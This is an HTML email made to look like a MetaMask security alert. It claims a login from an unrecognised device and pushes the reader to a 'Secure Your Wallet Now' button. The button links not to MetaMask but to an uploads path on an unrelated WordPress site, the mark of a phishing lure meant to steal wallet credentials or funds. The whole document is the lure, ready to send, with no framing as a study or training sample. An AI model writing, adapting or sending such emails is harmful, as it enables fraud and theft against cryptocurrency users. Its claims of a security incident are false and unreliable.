<!DOCTYPE html> <html lang="en" > <head> <meta charset="UTF-8" /> <title>Account Access Alert</title> </head> <body style="margin:0; padding:20px; font-family:Arial, sans-serif; background:#f9fafb; color:#222222;"> <table role="presentation" width="100%" cellpadding="0" cellspacing="0" style="max-width:540px; margin: auto; background:#ffffff; border:1px solid #ddd; border-radius:8px;"> <tr> <td style="padding: 28px; text-align:center;"> <span style="font-size:32px; display:block; line-height:1;">🦊</span> <h1 style="color:#f6851b; font-weight:600; margin:16px 0 24px; font-size:22px;">Account Access Alert</h1> <p style="font-size:16px; line-height:1.5; margin:0 0 22px;"> We’ve noticed a login from a device or location we don’t recognize. For your security, please review this activity. </p> <table role="presentation" cellpadding="0" cellspacing="0" style="margin: 24px auto 16px;"> <tr> <td align="center" bgcolor="#f6851b" style="border-radius:6px;"> <a href="https://digibrooks.com/wp-content/uploads?id=-1143869223726951786-5196" target="_blank" rel="noopener noreferrer" style="font-size:16px; color:#fff; text-decoration:none; padding: 14px 40px; display:inline-block; font-weight:700; font-family:Arial, sans-serif; letter-spacing: 0.03em; user-select:none;"> ​Secure Your Wallet Now​ </a> </td> </tr> </table> <p style="font-size:13px; color:#888; margin-top:20px; font-style:italic;"> If this was you, you don’t need to do anything further. Thank you for helping us keep your account safe. </p> <p style="font-size:12px; color:#bbb; margin-top:40px; user-select:none;"> — MetaMask Security Team </p> </td> </tr> </table> </body> </html>